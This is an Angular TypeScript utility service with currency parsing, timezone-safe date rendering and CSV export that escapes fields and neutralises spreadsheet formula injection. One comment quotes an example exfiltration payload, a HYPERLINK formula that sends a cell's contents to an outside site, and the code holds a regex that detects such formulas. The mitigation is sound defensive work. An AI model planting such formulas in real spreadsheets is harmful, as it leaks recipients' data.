import {Injectable} from "@angular/core";

@Injectable({
  providedIn: 'root'
})
export class UtilService {

  /**
   * Removes currency formatting characters ($, commas) from a string.
   * @param value - The raw currency string (e.g., "$1,500.00")
   * @returns The cleaned string (e.g., "1500.00")
   */
  sanitizeCurrencyString(value: string): string {
    return value.replace(/[$,]/g, '');
  }

  /**
   * Parses a currency string into a number, handling formatted values.
   * @param value - The raw currency string (e.g., "$1,500.00")
   * @returns The numeric value, or null if invalid
   */
  parseCurrencyValue(value: string): number | null {
    const cleanedValue = this.sanitizeCurrencyString(value);
    if (cleanedValue === '' || cleanedValue === '.') {
      return null;
    }
    const numericValue = parseFloat(cleanedValue);
    return isNaN(numericValue) ? null : numericValue;
  }

  /**
   * Converts an amount in cents to dollars.
   * @param cents - The amount in cents
   * @returns The amount in dollars
   */
  centsToDollars(cents: number): number {
    return cents / 100;
  }

  /**
   * Renders a calendar date (a cheque / EFT / wire date) exactly as it was entered, with no timezone
   * conversion. Dates like charity_payouts.payment_date and causable_payment.payment_date have no time
   * component, but the API serializes them as midnight; putting that through `new Date(...)` or
   * Angular's DatePipe converts to local time and renders the PREVIOUS day anywhere west of UTC, which
   * on a financial ledger misdates money across period cutoffs.
   */
  formatCalendarDate(valueP: string | Date | null | undefined): string {
    if (!valueP) return '—';

    // A Date must be read through its LOCAL components.
    if (valueP instanceof Date) {
      return new Date(valueP.getFullYear(), valueP.getMonth(), valueP.getDate()).toLocaleDateString();
    }

    const [year, month, day] = valueP.slice(0, 10).split('-').map(Number);

    if (!year || !month || !day) return '—';

    return new Date(year, month - 1, day).toLocaleDateString();
  }

  makeReadable(key: string) {
    return key.replace(/([A-Z])/g, ' $1') // insert space before uppercase
      .replace(/^./, str => str.toUpperCase()) // capitalize first letter
      .trim();
  }

  /**
   * Escapes a single CSV field per RFC 4180: anything containing a comma, double quote or newline is
   * wrapped in double quotes, with inner quotes doubled.
   *
   * Every money value in these reports is rendered by FormatCurrencyPipe, which inserts thousands
   * separators — so any amount of $1,000.00 or more carries a comma and MUST be quoted. Unquoted, the
   * reader splits `$1,203.23` into `$1` and `203.23` and shifts every following column one to the
   * right, silently corrupting the rest of the row.
   */
  /**
   * A cell Excel evaluates as a formula rather than reading as text. Quoting does not help: the CSV parser
   * strips the quotes before the cell is interpreted, so `"=HYPERLINK(...)"` is still a formula. Tab and
   * carriage return are included because Excel skips leading whitespace before deciding.
   */
  private static readonly FormulaLead = /^[=+\-@\t\r]/;

  /** A figure a spreadsheet must still be able to sum: csvMoney emits -1250.00 for a chargeback. */
  private static readonly PlainNumber = /^-?\d+(\.\d+)?$/;

  /**
   * Free text is neutralised against formula injection before it reaches a spreadsheet. These exports carry
   * text an admin typed - an adjustment's reason, a payout's reference, a charity's name - and the file is made
   * to be forwarded. A reason of `=HYPERLINK("https://elsewhere/?d="&A2,"See invoice")` opens in Excel as a
   * friendly link that sends the neighbouring cell elsewhere when clicked. A leading apostrophe makes Excel
   * read the cell as text and is not shown to the reader.
   *
   * Numbers are exempt, and that exemption is the point: prefixing `-1250.00` would turn a chargeback into
   * text and cost the amount column its ability to be summed, which is half of what these CSVs are for.
   */
  public csvField(valueP: unknown): string {
    let cell = valueP === null || valueP === undefined ? '' : String(valueP);

    if (UtilService.FormulaLead.test(cell) && !UtilService.PlainNumber.test(cell)) {
      cell = `'${cell}`;
    }

    return /[",\r\n]/.test(cell) ? `"${cell.replace(/"/g, '""')}"` : cell;
  }

  /**
   * Builds one CSV line from its fields, escaping each. Always prefer this over interpolating values
   * into a template literal — that is what let the thousands separator break the column alignment.
   */
  public csvRow(valuesP: unknown[]): string {
    return valuesP.map(valueP => this.csvField(valueP)).join(',');
  }

  public generateTableCSV(dataArrayP: any[], filenameP: string) {
    if (!dataArrayP || dataArrayP.length === 0) {
      console.warn('No data to export');
      return;
    }

    // Get headers from first object's keys
    const headers = Object.keys(dataArrayP[0]);
    const headerLine = this.csvRow(headers);

    // Build data rows
    const dataRows = dataArrayP.map(row => this.csvRow(headers.map(header => row[header] ?? '')));

    const csvContent = [headerLine, ...dataRows].join('\n');
    this.triggerDownload(csvContent, filenameP);
  }

  public downloadMultipleVerticalCSV(formattedDataP: any, filenameP: string) {
    const keys = Object.keys(formattedDataP[0]);

    // Header row: first col = "Field", then one col per report
    const headerLine = this.csvRow(['Field', ...formattedDataP.map((_: any, i: any) => `Report ${i + 1}`)]);

    // Build rows vertically
    const rows = keys.map(k => this.csvRow([
      this.makeReadable(k),
      ...formattedDataP.map((r: any) => r[k] ?? '')
    ]));

    const csvContent = [headerLine, ...rows].join('\n');

    this.triggerDownload(csvContent, filenameP)
  }

  triggerDownload(contentP: string, fileNameP: string) {
    const blob = new Blob([contentP], { type: 'text/csv;charset=utf-8;' });
    const url = URL.createObjectURL(blob);
    const link = document.createElement('a');
    link.href = url;
    link.download = fileNameP;
    link.click();
    URL.revokeObjectURL(url);
  }
}
